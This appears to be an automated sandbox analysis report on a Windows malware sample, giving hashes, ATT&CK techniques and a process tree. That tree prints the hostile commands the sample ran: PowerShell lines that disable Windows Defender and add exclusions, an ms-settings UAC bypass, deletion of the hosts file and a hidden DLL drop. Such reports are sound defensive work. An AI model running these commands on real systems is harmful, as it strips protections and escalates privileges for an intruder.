94c031079577c3431e51d10376bc1d848afcb8d6f19bd43646ebc8473d078001

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
09/02/2025, 20:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

USER_OOBEAQUA.exe
Size

7.2MB
MD5

d2b0890b42f11c7769c966f7084998ed
SHA1

db7357486ec4808fa11afe5bdca1f0ae2803720f
SHA256

94c031079577c3431e51d10376bc1d848afcb8d6f19bd43646ebc8473d078001
SHA512

e8065083342fe32aa888e176bb55f41a3619affdc337d3aed88f1664480520e922c4dfc0227db14fe4d5c8ce951272d958aea95237091561d817c9c2f1384c24
SSDEEP

196608:bCOGAi/C9gDJLc52NP+DU+iudcKX5Q2oc+nBIdAxU:WOmCqDtcSPpuiySnnBIp

Score

8^/10

defense_evasion discovery execution upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2024	powershell.exe
3548	powershell.exe
3644	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0007000000023c60-22.dat	acprotect
behavioral2/files/0x0007000000023c52-28.dat	acprotect
behavioral2/files/0x0007000000023c5e-32.dat	acprotect
behavioral2/files/0x0007000000023c59-50.dat	acprotect
behavioral2/files/0x0007000000023c58-49.dat	acprotect
behavioral2/files/0x0007000000023c57-48.dat	acprotect
behavioral2/files/0x0007000000023c56-47.dat	acprotect
behavioral2/files/0x0007000000023c55-46.dat	acprotect
behavioral2/files/0x0007000000023c54-45.dat	acprotect
behavioral2/files/0x0007000000023c53-44.dat	acprotect
behavioral2/files/0x0007000000023c51-43.dat	acprotect
behavioral2/files/0x0007000000023c65-42.dat	acprotect
behavioral2/files/0x0007000000023c64-41.dat	acprotect
behavioral2/files/0x0007000000023c63-40.dat	acprotect
behavioral2/files/0x0007000000023c5f-37.dat	acprotect
behavioral2/files/0x0007000000023c5d-36.dat	acprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation	bound.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 3 IoCs

pid	Process
4156	bound.exe
1848	loader.exe
2776	Glorius Loader.exe

Loads dropped DLL 17 IoCs

pid	Process
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe
544	USER_OOBEAQUA.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	raw.githubusercontent.com
25	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
61	checkip.amazonaws.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
1680	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3340	cmd.exe

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c60-22.dat	upx
behavioral2/memory/544-26-0x0000000074E40000-0x0000000075417000-memory.dmp	upx
behavioral2/files/0x0007000000023c52-28.dat	upx
behavioral2/memory/544-31-0x0000000074DF0000-0x0000000074E10000-memory.dmp	upx
behavioral2/files/0x0007000000023c5e-32.dat	upx
behavioral2/files/0x0007000000023c59-50.dat	upx
behavioral2/files/0x0007000000023c58-49.dat	upx
behavioral2/files/0x0007000000023c57-48.dat	upx
behavioral2/files/0x0007000000023c56-47.dat	upx
behavioral2/files/0x0007000000023c55-46.dat	upx
behavioral2/files/0x0007000000023c54-45.dat	upx
behavioral2/files/0x0007000000023c53-44.dat	upx
behavioral2/files/0x0007000000023c51-43.dat	upx
behavioral2/files/0x0007000000023c65-42.dat	upx
behavioral2/files/0x0007000000023c64-41.dat	upx
behavioral2/files/0x0007000000023c63-40.dat	upx
behavioral2/files/0x0007000000023c5f-37.dat	upx
behavioral2/files/0x0007000000023c5d-36.dat	upx
behavioral2/memory/544-33-0x0000000074DE0000-0x0000000074DED000-memory.dmp	upx
behavioral2/memory/544-56-0x0000000074DB0000-0x0000000074DD8000-memory.dmp	upx
behavioral2/memory/544-58-0x0000000074D90000-0x0000000074DA8000-memory.dmp	upx
behavioral2/memory/544-60-0x0000000074D70000-0x0000000074D8C000-memory.dmp	upx
behavioral2/memory/544-62-0x0000000074C30000-0x0000000074D6F000-memory.dmp	upx
behavioral2/memory/544-64-0x0000000074C10000-0x0000000074C25000-memory.dmp	upx
behavioral2/memory/544-66-0x0000000074BC0000-0x0000000074BCC000-memory.dmp	upx
behavioral2/memory/544-68-0x0000000074B90000-0x0000000074BBE000-memory.dmp	upx
behavioral2/memory/544-73-0x0000000074AE0000-0x0000000074B88000-memory.dmp	upx
behavioral2/memory/544-74-0x0000000074740000-0x0000000074AD4000-memory.dmp	upx
behavioral2/memory/544-76-0x0000000074DF0000-0x0000000074E10000-memory.dmp	upx
behavioral2/memory/544-72-0x0000000074E40000-0x0000000075417000-memory.dmp	upx
behavioral2/memory/544-78-0x00000000746C0000-0x00000000746D1000-memory.dmp	upx
behavioral2/memory/544-80-0x00000000746B0000-0x00000000746BC000-memory.dmp	upx
behavioral2/memory/544-84-0x0000000074580000-0x0000000074698000-memory.dmp	upx
behavioral2/memory/544-83-0x0000000074D90000-0x0000000074DA8000-memory.dmp	upx
behavioral2/memory/544-114-0x0000000074D70000-0x0000000074D8C000-memory.dmp	upx
behavioral2/memory/544-141-0x0000000074C30000-0x0000000074D6F000-memory.dmp	upx
behavioral2/memory/544-204-0x0000000074740000-0x0000000074AD4000-memory.dmp	upx
behavioral2/memory/544-205-0x0000000074E40000-0x0000000075417000-memory.dmp	upx
behavioral2/memory/544-203-0x0000000074AE0000-0x0000000074B88000-memory.dmp	upx
behavioral2/memory/544-202-0x0000000074B90000-0x0000000074BBE000-memory.dmp	upx
behavioral2/memory/544-201-0x0000000074BC0000-0x0000000074BCC000-memory.dmp	upx
behavioral2/memory/544-200-0x0000000074C10000-0x0000000074C25000-memory.dmp	upx
behavioral2/memory/544-199-0x0000000074C30000-0x0000000074D6F000-memory.dmp	upx
behavioral2/memory/544-198-0x0000000074D70000-0x0000000074D8C000-memory.dmp	upx
behavioral2/memory/544-197-0x0000000074D90000-0x0000000074DA8000-memory.dmp	upx
behavioral2/memory/544-196-0x0000000074DB0000-0x0000000074DD8000-memory.dmp	upx
behavioral2/memory/544-195-0x0000000074DE0000-0x0000000074DED000-memory.dmp	upx
behavioral2/memory/544-194-0x0000000074DF0000-0x0000000074E10000-memory.dmp	upx
behavioral2/memory/544-193-0x0000000074580000-0x0000000074698000-memory.dmp	upx
behavioral2/memory/544-192-0x00000000746B0000-0x00000000746BC000-memory.dmp	upx
behavioral2/memory/544-191-0x00000000746C0000-0x00000000746D1000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\cldapi.dll	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	USER_OOBEAQUA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	USER_OOBEAQUA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dllhost.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\29520.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3625106387-4207083342-115176794-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3644	powershell.exe
3644	powershell.exe
2024	powershell.exe
2024	powershell.exe
3548	powershell.exe
3548	powershell.exe
2024	powershell.exe
3644	powershell.exe
3548	powershell.exe
5020	dllhost.exe
5020	dllhost.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1040	WMIC.exe
Token: SeSecurityPrivilege	1040	WMIC.exe
Token: SeTakeOwnershipPrivilege	1040	WMIC.exe
Token: SeLoadDriverPrivilege	1040	WMIC.exe
Token: SeSystemProfilePrivilege	1040	WMIC.exe
Token: SeSystemtimePrivilege	1040	WMIC.exe
Token: SeProfSingleProcessPrivilege	1040	WMIC.exe
Token: SeIncBasePriorityPrivilege	1040	WMIC.exe
Token: SeCreatePagefilePrivilege	1040	WMIC.exe
Token: SeBackupPrivilege	1040	WMIC.exe
Token: SeRestorePrivilege	1040	WMIC.exe
Token: SeShutdownPrivilege	1040	WMIC.exe
Token: SeDebugPrivilege	1040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1040	WMIC.exe
Token: SeRemoteShutdownPrivilege	1040	WMIC.exe
Token: SeUndockPrivilege	1040	WMIC.exe
Token: SeManageVolumePrivilege	1040	WMIC.exe
Token: 33	1040	WMIC.exe
Token: 34	1040	WMIC.exe
Token: 35	1040	WMIC.exe
Token: 36	1040	WMIC.exe
Token: SeDebugPrivilege	1680	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1040	WMIC.exe
Token: SeSecurityPrivilege	1040	WMIC.exe
Token: SeTakeOwnershipPrivilege	1040	WMIC.exe
Token: SeLoadDriverPrivilege	1040	WMIC.exe
Token: SeSystemProfilePrivilege	1040	WMIC.exe
Token: SeSystemtimePrivilege	1040	WMIC.exe
Token: SeProfSingleProcessPrivilege	1040	WMIC.exe
Token: SeIncBasePriorityPrivilege	1040	WMIC.exe
Token: SeCreatePagefilePrivilege	1040	WMIC.exe
Token: SeBackupPrivilege	1040	WMIC.exe
Token: SeRestorePrivilege	1040	WMIC.exe
Token: SeShutdownPrivilege	1040	WMIC.exe
Token: SeDebugPrivilege	1040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1040	WMIC.exe
Token: SeRemoteShutdownPrivilege	1040	WMIC.exe
Token: SeUndockPrivilege	1040	WMIC.exe
Token: SeManageVolumePrivilege	1040	WMIC.exe
Token: 33	1040	WMIC.exe
Token: 34	1040	WMIC.exe
Token: 35	1040	WMIC.exe
Token: 36	1040	WMIC.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	3548	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5020	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 544	2372	USER_OOBEAQUA.exe	84
PID 2372 wrote to memory of 544	2372	USER_OOBEAQUA.exe	84
PID 2372 wrote to memory of 544	2372	USER_OOBEAQUA.exe	84
PID 544 wrote to memory of 2364	544	USER_OOBEAQUA.exe	88
PID 544 wrote to memory of 2364	544	USER_OOBEAQUA.exe	88
PID 544 wrote to memory of 2364	544	USER_OOBEAQUA.exe	88
PID 544 wrote to memory of 2032	544	USER_OOBEAQUA.exe	89
PID 544 wrote to memory of 2032	544	USER_OOBEAQUA.exe	89
PID 544 wrote to memory of 2032	544	USER_OOBEAQUA.exe	89
PID 544 wrote to memory of 2924	544	USER_OOBEAQUA.exe	91
PID 544 wrote to memory of 2924	544	USER_OOBEAQUA.exe	91
PID 544 wrote to memory of 2924	544	USER_OOBEAQUA.exe	91
PID 544 wrote to memory of 1792	544	USER_OOBEAQUA.exe	92
PID 544 wrote to memory of 1792	544	USER_OOBEAQUA.exe	92
PID 544 wrote to memory of 1792	544	USER_OOBEAQUA.exe	92
PID 544 wrote to memory of 3260	544	USER_OOBEAQUA.exe	94
PID 544 wrote to memory of 3260	544	USER_OOBEAQUA.exe	94
PID 544 wrote to memory of 3260	544	USER_OOBEAQUA.exe	94
PID 544 wrote to memory of 2736	544	USER_OOBEAQUA.exe	98
PID 544 wrote to memory of 2736	544	USER_OOBEAQUA.exe	98
PID 544 wrote to memory of 2736	544	USER_OOBEAQUA.exe	98
PID 2364 wrote to memory of 2024	2364	cmd.exe	99
PID 2364 wrote to memory of 2024	2364	cmd.exe	99
PID 2364 wrote to memory of 2024	2364	cmd.exe	99
PID 1792 wrote to memory of 4156	1792	cmd.exe	102
PID 1792 wrote to memory of 4156	1792	cmd.exe	102
PID 1792 wrote to memory of 4156	1792	cmd.exe	102
PID 2032 wrote to memory of 3644	2032	cmd.exe	101
PID 2032 wrote to memory of 3644	2032	cmd.exe	101
PID 2032 wrote to memory of 3644	2032	cmd.exe	101
PID 2924 wrote to memory of 3548	2924	cmd.exe	103
PID 2924 wrote to memory of 3548	2924	cmd.exe	103
PID 2924 wrote to memory of 3548	2924	cmd.exe	103
PID 3260 wrote to memory of 1680	3260	cmd.exe	104
PID 3260 wrote to memory of 1680	3260	cmd.exe	104
PID 3260 wrote to memory of 1680	3260	cmd.exe	104
PID 2736 wrote to memory of 1040	2736	cmd.exe	105
PID 2736 wrote to memory of 1040	2736	cmd.exe	105
PID 2736 wrote to memory of 1040	2736	cmd.exe	105
PID 4156 wrote to memory of 1848	4156	bound.exe	107
PID 4156 wrote to memory of 1848	4156	bound.exe	107
PID 4156 wrote to memory of 2776	4156	bound.exe	108
PID 4156 wrote to memory of 2776	4156	bound.exe	108
PID 1848 wrote to memory of 2124	1848	loader.exe	110
PID 1848 wrote to memory of 2124	1848	loader.exe	110
PID 1848 wrote to memory of 348	1848	loader.exe	113
PID 1848 wrote to memory of 348	1848	loader.exe	113
PID 348 wrote to memory of 1508	348	cmd.exe	115
PID 348 wrote to memory of 1508	348	cmd.exe	115
PID 348 wrote to memory of 2212	348	cmd.exe	116
PID 348 wrote to memory of 2212	348	cmd.exe	116
PID 1848 wrote to memory of 1824	1848	loader.exe	117
PID 1848 wrote to memory of 1824	1848	loader.exe	117
PID 1824 wrote to memory of 4304	1824	cmd.exe	119
PID 1824 wrote to memory of 4304	1824	cmd.exe	119
PID 4304 wrote to memory of 3952	4304	ComputerDefaults.exe	120
PID 4304 wrote to memory of 3952	4304	ComputerDefaults.exe	120
PID 3952 wrote to memory of 3036	3952	wscript.exe	121
PID 3952 wrote to memory of 3036	3952	wscript.exe	121
PID 1848 wrote to memory of 3752	1848	loader.exe	123
PID 1848 wrote to memory of 3752	1848	loader.exe	123
PID 1848 wrote to memory of 3916	1848	loader.exe	125
PID 1848 wrote to memory of 3916	1848	loader.exe	125
PID 3916 wrote to memory of 4972	3916	cmd.exe	127

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1244	attrib.exe

C:\Users\Admin\AppData\Local\Temp\USER_OOBEAQUA.exe
"C:\Users\Admin\AppData\Local\Temp\USER_OOBEAQUA.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Users\Admin\AppData\Local\Temp\USER_OOBEAQUA.exe
  "C:\Users\Admin\AppData\Local\Temp\USER_OOBEAQUA.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\USER_OOBEAQUA.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\USER_OOBEAQUA.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2032
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1792
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4156
    - - C:\Users\Admin\AppData\Roaming\loader.exe
        
        "C:\Users\Admin\AppData\Roaming\loader.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1848
      - C:\Windows\system32\cmd.exe
        
        /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        6⤵
        
        PID:2124
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        7⤵
        
        PID:1364
      - C:\Windows\system32\cmd.exe
        
        /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\29520.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:348
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\29520.vbs" /f
        7⤵
        Modifies registry class
        
        PID:1508
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        7⤵
        Modifies registry class
        
        PID:2212
      - C:\Windows\system32\cmd.exe
        
        /c start /B ComputerDefaults.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1824
        
        C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4304
        
        C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\29520.vbs
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3952
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
        9⤵
        
        PID:3036
      - C:\Windows\system32\cmd.exe
        
        /c del /f C:\Users\Admin\AppData\Local\Temp\29520.vbs
        6⤵
        
        PID:3752
      - C:\Windows\system32\cmd.exe
        
        /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3916
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        7⤵
        Modifies registry class
        
        PID:4972
      - C:\Windows\System32\dllhost.exe
        
        "C:\Windows\System32\dllhost.exe"
        6⤵
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:5020
        
        C:\Windows\system32\cmd.exe
        
        /c cmd.exe /c "move "C:\ProgramData\bungee.boo" "C:\Windows\cldapi.dll""
        7⤵
        
        PID:3612
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c "move "C:\ProgramData\bungee.boo" "C:\Windows\cldapi.dll""
        8⤵
        
        PID:4712
        
        C:\Windows\system32\cmd.exe
        
        /c attrib +h "C:\Windows\cldapi.dll"
        7⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:3340
        
        C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Windows\cldapi.dll"
        8⤵
        Drops file in Windows directory
        Views/modifies file attributes
        
        PID:1244
    - - C:\Users\Admin\AppData\Local\Temp\Glorius Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Glorius Loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:2776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\bungee.boo

Filesize
134KB

MD5
9bf4cc012b077635bd32ed8cf1399b2b

SHA1
eaed7fb7ac0419b802c7fe15cc06bd2ceae3edf4

SHA256
1ebf8802ff4fbb33bdfd2b6db0990354b61e45e1eb04921e778f7844abdedd6f

SHA512
5cee7033be679392bab65661638a75b01b7ac40ad936993d9ce1615aa650ea1b462e74b54bfade56051e5322f8abbf6a46246fdcc182edb328f932787886b2a8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
c9be626e9715952e9b70f92f912b9787

SHA1
aa2e946d9ad9027172d0d321917942b7562d6abe

SHA256
c13e8d22800c200915f87f71c31185053e4e60ca25de2e41e160e09cd2d815d4

SHA512
7581b7c593785380e9db3ae760af85c1a889f607a3cd2aa5a2695a0e5a0fe8ee751578e88f7d8c997faeda804e2fc2655d859bee2832eace526ed4379edaa3f5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
b6ae18d0842c423db76db24fe5c757b7

SHA1
710a8fbde4dd61e8db9ff1ec5e9d3b14e633a336

SHA256
db53540601e2519a780ee8df8ece6a7b365bcd5e3763e77320836246bca3da5c

SHA512
4af018b5322817ec7af659374774c214bdfd856df7fb48c1d506074558e1ccfe284a29955bf2ed6732e4b5167bfa1897556b7ab1a023665a540fc6b02647852d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d63b61980b308a2dc54c4fb5114be881

SHA1
b4e22d8a37e499c8c96cab64cc095dea6d8dcbb3

SHA256
33e4c43e4d38d0c583d1cbd9eb0f85f71c97bf37f82cb7d99a56c01b1999dc27

SHA512
45e9e4c93ec58be46facb7417769f09b19ed0c223b434c9da43466c33f5af7c797def04a3527c2960cfc089f4ee2d3a5ab712eb73fc3c7611201397e0a05f5ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
